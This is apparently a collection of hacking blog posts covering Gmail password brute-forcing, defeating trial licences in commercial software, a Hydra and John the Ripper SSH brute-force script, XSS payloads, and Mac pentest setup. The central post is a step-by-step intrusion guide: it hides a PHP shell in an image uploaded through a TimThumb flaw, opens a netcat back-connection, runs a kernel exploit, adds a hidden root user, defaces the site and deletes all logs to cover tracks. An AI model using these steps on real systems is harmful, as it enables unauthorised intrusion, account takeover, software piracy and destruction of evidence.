Look Ma' .... NO TOOLS :-)

Well this will probably come off weird by the time i explain the whole ordeal ... see recently i really wanted to publish about my best tools... but hey i also wanted to publish a little about Phone Network hacking and thought hmmm i will have to do a practical on that so wait till my tools arrive... then the vicious cycle came back and i had to go back to the basics of ... Not having/using any tools so ...here we go...

No Tools... well this is impossible ...why? maybe because tools are everywhere heck your browser is a tool , your terminal is a tool, ummm yes your BRAIN... this is a very handy tool, so here goes my No-Tools list :)

Brain---> very important needs a lot of nourishment including a little rest here and there (yes its not all work and no play)

Terminal---> yes this little creature awes many when they finally know who/how/where/when to use it

Browser--->I have always insisted on using the browser as a tool but why??? well maybe because its called a browser... its the one thing that we can actually see a graphical output/input of the data we feed and also comes from it anywho.....

Here is my working of all this lets start from this point where we all want to do a pentest and we want to avoid tools just for the sake of (not wanting/having*) the tool so here we start by Information gathering ... only the above tools....

say we are attempting to get information about a website we want to pentest... the tools only the above ... here we go :)

PASSIVE INFORMATION GATHERING
Footprinting---aimed at gathering intelligence about the infrastructure of a target network, only from information which access is free and authorized. It is the first component of the information gathering step of a pentest, before port scanning and fingerprinting.

here we can fire up our *nix terminal and have a heads on lock on this by doing the following
- DNS query: with a domain name, you obtain the associated IP. Any field of the DNS response can be exploited: A, MX, etc. ,
- reverse DNS query: with an IP or an IP addresses range, you obtain domain names,

here we can also fire up our browser and do simple but informative steps such as
- WhoIs database: you obtain the informations legally provided for the domain name rental,
- search engines queries,
- X509 certificates queries,
- robots.txt of the website analysis,

-websource code

and with some nifty tricks we can move on to:

FingerPrinting and Port Scanning
well on port scanning its very tricky to do this with only the above tools but default configurations will tell us a lot about this website e.g

-Noting down the Favicon---to tell us what CMS is running
-Noting /Generating errors on the website---to tell us on webservers platform and ports e.g 80,8080,443

-Noting the protocols implemented-- from webmail logins(we can get an open port) from, https (443) ftp links e.t.c

see we are already getting information just by simple and yet effective tactics...

well i cant outline all tricks in one page but this should get you rolling others will come off as such, 

giving us lots of ways to go around the website with attacks /vulnerabilities known to the running services/platform/CMS

with that doing XSS,SQL,brute force(web forms) , RFI.LFIs and other techniques become reliable and a little easier than before... am not saying tools are not usefull am saying working from a knowledgeable point of view is more relatable and easier .

have a good day won't you :)

My FaceBook has Been Hacked - Retard Theory

Security is not always about breaking in actually its also about protecting, ensuring, reliability and more than just hacks.

When I commit to research ,information security i meet a vast number of people who go from a level of really no clue what security is... to a level of impossible security senario ,what am i talking about? here is a small clue:

Can a Facebook account be hacked?

Ans 1: [Advance Diploma in Computer Engineering Gradate] No , its a lie its impossible

Ans 2: [Zero technical information random person] Yes, actually last week my Facebook account was hacked

now standing of from this two answers here is my two cents ...Yes Facebook accounts can be hacked in numerous ways one of this ways i will show you in clear margins, NO its not impossible to hack Facebook accounts. But Facebook is very secure----> Yes FACEBOOK  .... not you... hardly are you secure....why because we are humans... and we love simplicity and thats why we are hardly secure.

Passwords
random question, how many different passwords do you have?
let me guess an average of 4

• your 4 digit password (PIN) ATM pin, mobile code, mobile money transfer code (MPESA)
• your sign-in password (gmail,ymail,yahoo,msn,twitter,facebook,youtube,scribd)
• your special password (this comes from sites that manipulate password inputs e.g itunes account use a standard issue of 1 UpperCase letter a, number and 8 minimum characters in your password)
• then you have your very hard to crack password :)

lets see so if i have your sign-in password i basically have 70% of your passwords .... on a smll scale factor but how do i get it? well though some systems have tried very hard to avoid you being compromised e.g itunes has its password rules such as W4njiru is a valid password and gmail has measures that restrict the dictionary names such as telephone from being used , also reverse names like drowssap for password not many people set different rules from themselves.... 

its hardly *hardcore hacking when your password is reallyhotchick and your username is reallyhotchick@gmail.com yes even reallyhotchick1990 is not a password why? because thats your date of birth silly and yes its easy to remember here is a catch wanna get really sturborn when creating your password think crazy... not your fav ANYTHING heck not even your secret think of a phrase eg.

bitchisawyoucreepingwithmyman then manipulate it.... how change everything that looks like a number  to a number :) so it becomes b1tch1s4wy0ucr33p1ngw1thmym4n well thats really hard (duuh thats the point) but ah ah not yet what about adding some more complexity adding characters e.g !*#^*@%$

you can use them as spacing e.g b1tch!1s4w_y0u,cr33p1ngw1th*mym4n? 

and thats a password :) but its long and complex EXACTLY

and for PIN 1992 is not a good thing if your daughter or you were born in 1992 and so is 2991

moving on :

LogOUT

Are you on a shared computer (shared even means your bff---- Yes... LOG THE FUCK OUT)

Remember Password

well if it is my computer i can set it to remember my password.. sure why not exept there are tools that steal passwords on the go e.g the android tool installed on an android phone (yah ok) and connected to you computer via USB downloads* all the available passwords from firefox passwords, windows passwords....e.t.c read about it here

well to protect yourself from things like this

• Strong login password ---again--- (yes to your computer)
• Keyring's--- what are they :) google them if not found or helpful ask in the comment box
• Lock your computer when you leave aight???
• if possible set permissions to installing software to require a password 

SSL

Say what???? you are in a cybercafe ... again and this time you brought your laptop :) no way they can hack me (well maybe not on those machines)... you sip your juice comfortably noticing everyone using the wi-fi (probably open) and hmmmm what do you know, even the matatus(public vehicles) this days have the same tech-savy ingenious wi-fi guess what ... does your facebook url look like so
http://facebook.com well then.... you my friend are screwed... please go to your settings on facebook and adjust them to use ssl... hence a simple url change will look as such https://facebook.com the HTTPS is a more secure encrypted format much safer than HTTP... now Browse away :)

Links

Ohhhhhh RayJs sextape :) i wanna view 

one proverb .... Curiosity killed the Cat.... you wanna die click away read more here

So am i secure yet... well we are getting there but hey maybe the long password is easily forgettable DONT WRITE IT DOWN ANYWHERE .... cram if you cant there keyrings that store passwords and you authenticate with questions or phrases aight :) we will continue later
CIAO dont get hacked

oww :)

GOOD DAY ... and Happy Info-Security

BruteForce Attack with WebBrowsers [GMAIL]

today i will show you how to do password test via your web browser

well this is via mozilla oriented web browsers e.g Ice weasel (comes on kali linux) and firefox(there other variants---dont use em though) and OWASP Mantra browser
 
so firstt you will need to grab some tools for your hack to be effective.....here is my collection that i add incase i dont wanna use the whole mishap of OWASP mantra(not that its bad but on FreeBSD its a bitch compiling linux enabled modules on it withouth a fit on 32->64 bit architectrue)

Pentest Tools for your Browser

then add the tools/tool (fireforce) and here on then we can work with that .... note this is not only useable on gmail... alot of things including weblogin forms such as WordPress/Joomla/Cpanel are supseptible to bruteforce attack....

so what we do first after installing from the collection is navigate to the desired page being:
gmail.com >>note this is entirely for educational purpose and this is done under your own peril

so after install and navigating we get this

so we enter our email/victim [junio1234junio] is not real :P

then we enter a fake password to generate an error that will be very helpful

now we right click on the password box to get the following fireforce plugin/extension

here we get a chance to select the wordlist file which we may have downloaded or created

next step is to add the error we logged when put a wrong password

and after that... we click save

and there goes nothing.... we attack/ oops test

and done password found :)

So what if i dont have a password/wordlist/dictionary list/file? well on many occasions one might not have them thats where fireforce comes in with a good method to create passwords on the test/attack using various character sets e.g a-z [lowercase] , A-Z [uppercase] ,0-9 [duuuh] mixed case> aA-Zz  and others... research for yourself :)

I have tested this in various web apps and its not funny.... it works.... well in most of them... anyway to combat these:

CAPTHA---- yes it helps
Other verification methods e.g Text very HELPFUL

CIAO happy hunting :)

  

SoftWare Analysis/Cracking/Testing its tricks and stupidity [part 2]

well continuing from our part 1 where we had found a bypass to extending/reseting the RPOSS that we were conducting an analysis on it.... so though a hacked software bearly needs to be 100 % clean ... having its reset being to re write a file continuously so i modified the file to be write-only and voila....
what do u know it still works.... what am simply saying is ...the software was not going to work as hey expected hence a security breech.... (but we dint hack it... ??? ) Did we ....?

SIMS---- owww dear so we start with decompiling it.... reading that when we overdated* it and backdated* it there was hardly a change.... it means that it locks from inside itself rather than outside(to the operating system level ok so the assessment starts.... for me i always start with the easy things first (this is what all hackers would definitely go for... and even noobs will spot)... and what is the easy thing... decompilation? well maybe... in this case its much easier seeing that .NET reflector decompiles the code to Visual C# so its not hard code as the case of ASM.... so here goes nothing, after a small decompilation of the form that handles activation... something catches my eye... very quick, we have a reference to the database in that form....why would we have that?? moving in on the clue i head to the database which is MySql and check for a few notables like we have normal tables (db users, students, teachers blah blah blah)... we have config tables VOILA ... configurations :) well in config (configurations) what do we have? well we have something named module, active and dateof_activation hmmmm see a pattern here? we have module (this would be one of the modules that we installed from the SIMS i.e examination module, finance module, school record module blah blah blah) checking on either i note al of them have the following information

module        active         dateof_activation
module1      false           12/3/13 (ok this is not the correct date format for MySql... but it is a 10 day                          advance from the day i forwarded it)

this goes on for all the modules... so... i edit the data fields and change active to true ... restart my application and voila!!! no error messages or warnings...

I would expose more if not for the lengthy subject as i said of embarrassing lazy developers... from this part of SQL injections on the application allowing me to add users via various form fields... in any case i go back to the teachers...

Is it possible for you(lecturers /teachers, consultants) to add some security information class when teaching developers about all this? if not .... our applications are as dangerous as letting a wolf lead sheep ... not that it would be better if it was vice versa :)

CIAO happy hunting

Passwords ... Hydra and Crunch have a date with your network .... Sema chipo

A fellow hacker friend complained ... Yes Bright you did, :) about the use of John the Ripper as opposed to crunch while using it with Hydra to brute force, so without much ado here is his opinion in a practical way :) 

You can use a direct pie between Crunch and Hydra, but it tests passwords much slower than it receives. So you have to use "xargs" buffering to adapt the entries in Hydra: 

crunch June 4-f charset.lst mixalpha | xargs-L1 hydra 127.0.0.1 ssh-s 22-vV-l root / tmp / pass-es-t 10-p

The "-L1" xargs that the command (here hydra) is executed for each line received (Crunch, here). ca may take some time because Hydra can not launch multiple attacks at the same time, but by generating passwords on the fly is a problem that you do not cut it

SoftWare Analysis/Cracking/Testing its tricks and stupidity

Why so hush? well maybe because software developers dont have what it takes any more...
what do i mean? is it that teachers and lecturers are failing would be programmers and/or developers
to me they already did that.... here is my two cents worth..

we have classes , labs, training and development facilities well than equipped but whats the downfall ... SECURITY read (the practice) and why do I think/know so?

recently i was offered a job to do a system analysis and pentest the application blackbox to be specific now not one is what will be comparing but 2 applications one...

a SIMS (School Management Information System)
and
a RPOSS (Retail Point Of Sale System)

now forget the acronyms i would also forget me mentioning their names due to infringement of some laws and client privileges but hey here we go.

Under my job/pentest description my client(s) wanted to deploy the software but as trials to other users using the most common method that is user tries out product/service and product expires after a certain period efficient? .... maybe

so skipping on to the following .. the SIMS would be used in a standard 10 days then lock up completely forbidding any user to interact with it, while the RPOSS would be used in a speculated 60 days then also lock up completely forbidding access to the users totally...

well the terms highlighted in italic caption are as such on the SIMS (standard) it actually had ten days prior to installation to be used (in exact 10 days) then it would act up.... then to the RPOSS (speculated) it actually had 60 (actually 58) turns to be initialized (opened) then it would lockup.

{skipping the whole long conversation here is how i went at them}

• the first thing to do is install them.... (duuuh) > i normally make a backup my registry(export) before any installation is done , also do a regular process check to see what other/additional processes it/they will pull up.
• the second thing is check all the added files... for this i normally ensure i click show full details while installing noting down any different path from the one i have set being added or created.
• after install i usually export another registry from my computer and i can compare and asses all this on a required term.
• well >> we cant wait for 60 days or 10 days to actually see what happens can we? well not on my case... any-other analyst will probably fire up their expensive or complex tools and decompile the applications or library files or??? any who a pal and fellow hacker not to mention mentor (too much ass kissing ...? you should ... this guy is a god) chucks says every battle is won before its fought.. so no tools...for now , first thing first forward the date to 61 days from then :) why 61 not 10 (go figure) so:

here is what i get 

SIMS--------------- [duration overdue please enter activation code or register with the software supplier]

(or something like that :) )

RPOSS------------ {still opens !!!!! }

hmmm ok so what happens ( a backdate)

so i backdate the dates and start checking again.... response?

SIMS--------------- [duration overdue please enter activation code or register with the software supplier]

(or something like that :) )

RPOSS------------ {still opens !!!!! }

ok i think am missing something... but hey its to early to tell... why not check my registries .. here goes nothing (well actually nothing is true cos i find nothing) there tonnes of registry editors that allow auto or manual compare ... i prefer manual ... if you wanna learn about how the registry works (google) meanwhile post a comment and i will see what i can do. ok.... moving on.

what about we check the activation method...

1. can we bypass it?
2. is it valid?
3. whats its method?

I fire up my IDA pro and decompile this little bugger (well the RPOSS)

for the SIMS it has a lot of .NET req when installing so basically .NET reflector works much better while am handling it... what does RPOSS give us (for confidentiality reasons am not allowed to print the screenshot of the code but heres a fast forward) the method that handles the counter happens to save to a file!!!!! what???? what do you mean? an encrypted file? well actually no a *.cfg file. wow ok HOW LAZY so what happens here.... well lets open up the file ... a simple drag to gedit or kwrite (on windows notepad ) gives us an open file with the number 12 on it... ok...so what if i change to 0... still opens.... and to 70 or any number higher than 60? we get a warning/error [please register ***** as it was distributed without a license key] or something like that :)

amazing....so what ... one we found a flaw and i could go on about the numerous other issues on how the software/application was vulnerable but let me spare em developers the embarrasement.... 

what methods could have solved this programmer/developers issue? and why did i attack the teachers/lecturers?

well a lot of things... check that in my part two where we crack* the second system-the SIMS 

later CIAO

Browser as an Attack/Pentest Tool

Tools to add to your browser (firefox/mozzilla enabled browsers)

chrome i love but firefox to me tools it better (wareva that means)




This are addons found in the security framework/browser OWASP-Mantra and can come in handy when doing recon/pentest/attack/vuln assessment.|




I add them to my firefox/ice weasel(kali) to add more reinforcement (automation is not necessarily my thing but it gets the work done :)

CIAO have fun

oww here is the link to the collections <Collections> :)


I don not wish to deter from OWASP Mantra ...no no.... i just love the ease i have with this method especially on FreeBSD so if you wanna try OWASP Mantra.... :) have a go at it OWASP Mantra

XSS -slaying information from simple actions like----- a MOUSE HOVER :)

XSS well :) what do we know about it,

Cross Site Scripting as its called :) is a form of web vulnerability solely relying on scripts and scripting languages e.g javascript, HTML5 e.t.c

Some examples of exploitation include:

• injecting a fake login form;
• retrieving legitimate users' cookies;
• injecting browser's exploits;
• getting users to perform an arbitrary action in the web application;

...
and tonnes more....

a simple XSS would look like such <script>alert(1);</script> when injecting on a html form... on a url it may be as such :

http://urvulnerablewebsite-app.domain/xss/example.php?name=<script>alert(1);</script>

so what really happens? ....XSS comes from a lack of encoding when information gets sent to application's users. as opposed to other attacks it targets the client rather than the server.

how dangerous is this? well... here is a simple calculation ... 

XSS in url encoded format is hardly noticable to any viewer(looks like a normall url)

http://urvulnerablewebsite-app.domain/xss/example.php?name=kardashian_sex_tape%3Cp%20onmouseover=alert%28%27XSS%27%29%3Eer%3C/p%3E 

the above link (leave the sex tape outta this) unlike the other one has less <script> tags and contains more of the url encoded while it simply loads on a webpage without any immediate effect till you hover your mouse on the page :) !!! and whats the worst that can happen owwww i donno maybe .... fake login page injection (social sites , online bank) retrive legitimate user cookies from your browser :) ... get you to perform arbitrary actions on the web app without your consent (well your knowing consent)

more about this attack can be found here where theres a cheat sheet OWASP XSS cheet sheet also on its evasion and even more on how to protect yourself ... PEACE... am out

Venni, Viddi ,Vicci ....I hacked :P

Pentesting/hacking web apps

Find a Vulnerable Website –> Upload a c100/99 Shell (Hidden in an Image with iCon2PHP) –> Rooting the Server –> Defacing the Website –> Covering your Tracks




ok so will do that ... but since this will be done on my pentest lab i wont be so thorough with the proxy/anonymity but in the video i will cover the basic to the upload shell




So we first find the vulnerable website/app

(duuh)

We run the web scanner to look for vulnerabilities (arachni web scanner, acunetix, w3af, vega ,also sqlmap works quite ok if you know what your doing p.s so the others)




my vulnerability finds an insecure upload form ... :)




OK. Now, we have the site and the path that the vulnerability is. In our example let’s say it is here:

http://www.site.com/blog/wp-content/themes/theme_name/thumb.php

The above vulnerability affects WordPress blogs/ ViArt web app that have installed certain plugins or themes and haven’t updated to the latest version of TimThumb, which is a image-editing service on websites.

Till now, we know:

-The website’s blog has a huge vulnerability at TimThumb.

-It is hosted on a Unix System.

Next, because of the fact that the Vulnerability is located at an outdated TimThumb version, and timthumb is a service to edit images, we need to upload the shell instead of the image.

Thus, download any image (I would recommend a small one) from Google Images. We don’t care what it shows.

Generate Output with iCon2PHP

Copy your Image and your Shell to the Folder that iCon2PHP is located.

Run the Program and follow the in-program instructions to build the ‘finalImage.php’.

To avoid any errors while uploading rename the ‘finalImage.php’ to ‘image.php;.png’ (instead of png, type the image format your image was – jpeg,jpg,gif….) This is the exactly same file but it confuses the uploader and thinks that it actually is an image.



iCon2PHP Terminal Output:

[...]

Enter the Path of your Image: image.png
Please enter the path to the PHP: GnYshell.php

Entered!

Valid Files!
[...]
File: ‘finalImage.php’ has been successfully created at the Current Directory…

Upload Output to a Server:

Next, upload your ‘image.php;.png’ at a free server. (000webhost, 0fees etc….)

Go to the vulnerability and type at the URL:

http://www.site.com/blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png

It would be better to create a subdomain like “flickr.com” (or other big image-hosting service) because sometimes it doesn’t accept images from other websites.

Website…. Shelled!



OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.
 

Root the Server:

Now that you have shelled your website we can start the proccess to root the server.


What is rooting when it comes for Server Hacking?
—> Rooting a server is the proccedure when the hacker acquires root priviliges at the whole server. If you don’t understand this yet, I reasure you that by the end of the section “Rooting a server” you will have understood exactly what it is…

Let’s procceed to rooting….

Connect via netcat:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems….)
2. Open Terminal.
3. Type:


netcat

4. Now type:


-l -n -v -p 402

5.It should have an output like this:


listening on [any] 402 port

6. Now, go to the Back-Connection function at the Shell.
7. Complete with the following:


Host:YouIPAddress Port: 402 (or the port you forwarded….)

8. Hit connect and… Voila! Connected to the server!

Downloading and Executing the Kernel exploit:

1. Now, if you type:


whoami

you will see that you are not root yet…
2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. Find kernel exploitshere….
3. Download it to your HDD and then upload it to the server via the Shell. Unzip first, if zipped….
4. Now do the following exploit preparations:


– The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)

(( If the program is in C you have first to compile it by typing: gcc exploit.c -o exploit ))

– Change the permissions of the exploit:
chmod 777 exploit

5. Execute the exploit. Type:


./exploit

6. Root permissions acquired! Type this to ensure:


id

or


whoami

7. Add a new root user:


adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
where root1 is your desired username

8. Change the password of the new root user:


passwd root1

SUCCESSFULLY ROOTED!

Deface the Website:


What is defacing?
Defacing is the proccedure when the hacker uploads his own inbox webpage to alter the homepage of a site. In this way, he can boost his reputation or parse a message to the people or the company (which owns the website…).

Since you got the website shelled, you just create a nice hacky page in html and upload it via the Shell as inbox.html (Delete or rename the website’s one…)

Cover your tracks:

Till now you were under the anonymity of Tor or ProXPN. You were very safe. However, in order to ensure that it will be impossible for the admin to locate you we have to delete logs.

First of all, Unix based-Maschines have some logs that you have better to either edit or delete.
Common Linux log files name and their usage:


/var/log/message: General message and system related stuff
/var/log/auth.log: Authenication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/qmail/ : Qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd: Lighttpd access and error logs directory
/var/log/boot.log : System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp : Login records file
/var/log/yum.log: Yum log files

In short /var/log is the location where you should find all Linux logs file.

To delete all of them by once type:


su root1

rm -rf /var/log
mkdir /var/log




the video to this as an example under a virtual lab is here from my team :) ViArt Exploit

I hate downloading WordLists

1. Introduction

You most definetly know of THC Hydra ... well i love the tool problem is ...Hydra don’t digest huge lists of passwords. The reason is that Hydra will first try to load your password file into memory (RAM) before start the brute-force attack. And so, you are limited by your memory size plus i hate downloading the darn wordlists or dictionaries well why... takes to much time changes every now and then... and my internet speed sometimes sucks and the bundles lord the bundles.....so here is my tune up.... why dont we use two tools

HYDRA and John The Ripper

It’s OK with an usual password dictionary, but you could want more. Something like passwords list generated by “John the ripper” (John provides greats way to generate passwords: digit/alpha/special chars only, “rules” options, “external” filters, etc.)

Our goal is to use the output of John the ripper with Hydra.

The method is trivial but does the job.

loop

(1) Generate random passwords with John the Ripper in a file durring few seconds (file grow up very quickly).

Keep a john's session file.

(2) Run hydra with the passwords file.

(3) If found, exit. if not, continue the session created in (1).

end loop



2. The script

This is the bash script I wrote to perform the task.

· Review ‘hydra_*‘ variables (if need run ‘hydra –help’). See: ‘hydra_host‘, ‘hydra_port‘, ‘hydra_module‘, … and maybe ‘hydra_all_params‘.

· Review ‘john_*‘ variables. See: ‘john_all_params‘ and choose your template : (–incremental:All, –incremental:Digits , –incremental:Alpha , –single, –rules …) see john.conf file to get the list.

Enjoy!

Get hydra-john.sh

#!/bin/sh

hydra="/usr/local/bin/hydra"

john="/usr/bin/john"

hydra_module="ssh2"

hydra_host="127.0.0.1"

hydra_port="22"

hydra_nb_task="10"

hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns "

john_sessionfile="$1"

john_all_params="--incremental:Alpha --stdout"

john_time_step=20 # time (seconds) to run john

tmp_passwd="/tmp/pwd1234.tmp"

hydra_logfile="/tmp/hydralog"



if [ "$1" = "" ];then

echo "Usage: $0 <john session file>"

exit 0

fi



#for lfile in `ls $loginfiles*`;do



while [ 1 ];do

# generate some password with john the ripper

echo; echo "- Start (re)generating passwords with John"

if [ -e "$john_sessionfile.rec" ];then

# if session exist, restore it

$john --restore=$john_sessionfile > $tmp_passwd &

else

# if session not exist yet, create it

$john $john_all_params --session=$john_sessionfile > $tmp_passwd &

fi



# wait 100 seconds, then kill john and start hydra on it

echo "- Wait ..."

sleep $john_time_step

echo "- Kill john"

killall john 2>/dev/null 1>/dev/null

sleep 1



# start hydra

echo; echo "- Start hydra"; echo



rm -f $hydra_logfile

echo "$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile"

$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile



# if a valid pair has been found, stop the loop

if [ "`grep $hydra_module $hydra_logfile | grep -v DATA`" != "" ];then

echo; echo "FOUND !!"

grep $hydra_module $hydra_logfile | grep -v DATA

exit 0

fi


done



happy hunting ... oops learning .... p.s to check out this trick with a proxy(tor) check this site...am here fuu

Mac OSX and penetration Testing

I' am a MacBook/MacOSx user and i love pentesting ...problem is Mac doesnt have a Pentest enviroment unless i do a VM with my FreeBSD with tools.... aside from that i love custom tools so i also have custom tools either by my hand or from others....




Setting up a Pen-Testing environment on your Mac

Download and install Xcode
Open Xcode > Preferences > Download > Install Command line tools

Open Terminal:
> java
Install it.

Install Homebrew (fuck macports)
> ruby -e "$(curl -fsSkL raw.github.com/mxcl/homebrew/go)"

Run BrewDoctor (may need to fix your .bash_profile $PATH
> brew doctor

Install nmap and nping
> brew install nmap
> brew install ruby
> brew install postgresql (if you prefer mysql: brew install mysql)

Startup PGSQL
> initdb /usr/local/var/postgres
> createuser msf -P -h localhost
> createdb -O msf msf -h localhost

Install Metasploit gems
> gem install pg sqlite3 msgpack hpricot

Setup VNC Viewer for MSF
> echo '#!/usr/bin/env bash' >> /usr/local/bin/vncviewer
> echo open vnc://\$1 >> /usr/local/bin/vncviewer
> chmod +x /usr/local/bin/vncviewer

Install Metasploit (from repository)
Select the directory to install metasploit (ex: ~/tools)
> git clone git://github.com/rapid7/metasploit-framework.git

Additional Tools:
brew install dsniff (Password Sniffer)
brew install ettercap (MitM made easy)
brew install aircrack (Wifi Suite)
brew install john (John the Ripper)
brew install hydra (Brute Force Cracker)
brew install ophcrack (Rainbow Table Cracker)
brew install skipfish (WebApp Scanner)

"tcpdump" and "netcat" are pre-installed with OSX (don't over look them )

Download and install BurpSuite free
http://www.portswigger.net/burp/download.html